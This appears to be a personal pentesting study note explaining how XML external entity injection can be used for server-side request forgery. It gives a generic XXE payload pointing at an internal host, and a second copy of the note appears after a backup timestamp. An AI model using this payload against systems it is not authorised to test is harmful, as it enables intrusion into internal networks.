handbook/tools/3.Web-Hacking/4.Injection/XXE/Commands/2.XXE-SSRF-attacks.md


## Exploiting XXE to Perform SSRF Attacks

- Need to do the following:
	- Define an external XML entity using the URL you want to target
	- Use the defined entity within a data value

```xml
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM " http://internal.vulnerable-
website.com/"> ]>
```
vault backup: 2024-08-31 01:07:21 2024-08-30 23:07:22 +00:00
			`## Exploiting XXE to Perform SSRF Attacks`

			`- Need to do the following:`
			`- Define an external XML entity using the URL you want to target`
			`- Use the defined entity within a data value`

			```xml
			`<!DOCTYPE foo [ <!ENTITY xxe SYSTEM " http://internal.vulnerable-`
			`website.com/"> ]>`
			```